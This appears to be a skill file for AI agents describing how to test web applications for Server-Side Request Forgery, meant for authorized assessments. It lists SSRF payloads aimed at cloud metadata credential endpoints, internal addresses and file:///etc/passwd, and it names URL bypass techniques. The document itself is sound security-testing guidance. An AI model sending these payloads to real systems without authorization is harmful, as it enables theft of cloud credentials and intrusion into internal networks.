Files
Anthropic-Cybersecurity-Skills/skills/performing-ssrf-vulnerability-exploitation/SKILL.md
T

55 lines
2.1 KiB
Markdown

---
name: performing-ssrf-vulnerability-exploitation
description: >-
Test for Server-Side Request Forgery vulnerabilities by probing cloud metadata endpoints,
internal network services, and protocol handlers through user-controllable URL parameters.
Tests AWS/GCP/Azure metadata APIs (169.254.169.254), internal port scanning via HTTP,
URL scheme bypass techniques, and DNS rebinding detection.
domain: cybersecurity
subdomain: security-operations
tags: [performing, ssrf, vulnerability, exploitation]
version: "1.0"
author: mahipal
license: Apache-2.0
---
## When to Use
- When conducting security assessments that involve performing ssrf vulnerability exploitation
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
## Prerequisites
- Familiarity with security operations concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
## Instructions
1. Install dependencies: `pip install requests`
2. Identify URL parameters in the target application that accept URLs or hostnames.
3. Test SSRF payloads:
- Cloud metadata: `http://169.254.169.254/latest/meta-data/`
- Internal services: `http://127.0.0.1:port/`, `http://10.0.0.1/`
- Protocol handlers: `file:///etc/passwd`, `gopher://`, `dict://`
- Bypass techniques: IP encoding, DNS rebinding, URL redirects
4. Analyze responses for information disclosure or internal access confirmation.
5. Generate a vulnerability assessment report.
```bash
# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
```
## Examples
### AWS Metadata SSRF
```
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
```
If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.